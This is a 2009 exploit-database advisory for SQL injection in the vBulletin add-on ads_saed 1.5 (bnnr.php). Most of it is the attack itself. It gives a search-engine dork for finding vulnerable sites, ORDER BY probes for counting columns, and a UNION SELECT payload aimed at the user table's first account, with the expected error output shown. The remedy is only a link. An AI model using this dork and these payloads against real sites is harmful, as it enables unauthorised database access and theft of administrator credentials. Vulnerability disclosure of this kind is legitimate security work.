[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : vBulletin ads_saed 1.5 (bnnr.php) SQL Injection Vulnerability
# Published : 2009-12-30
# Author : Hussin X
# Previous Title : K-Rate SQL Injection Vulnerability
# Next Title : Azadi Network (page) Remote SQL Injection Vulnerability


vBulletin ads_saed 1.5 (bnnr.php) SQL Injection Vulnerability
___________________________________

Author: Hussin X

Home :  www.IQ-TY.com<http://www.IQ-TY.com>

Mail : darkangel_G85@yahoo.com<mailto:darkangel_G85@yahoo.com>
___________________________________

## script name : ads_saed

## d0rk : inurl:"vb/bnnr.php"

## Example :


Go to url : http://server/vb/bnnr.php<http://target.com/vb/bnnr.php>

Exploit in the input "user name" blind injection

user name = ' ORDER BY 15/*

user name = ' ORDER BY 16/*

Now go to Source page  :  " Unknown column '16' in 'order clause'"


exploit :

user name =
' UNION SELECT 1,2,3,4,5,4,7,8,9,10,11,12,13,14,15 FROM user where+userid=1/*



# Solution : See here

http://www.traidnt.net/vb/showthread.php?t=1102593

or update new Product



End

IQ-SecuritY FoRuM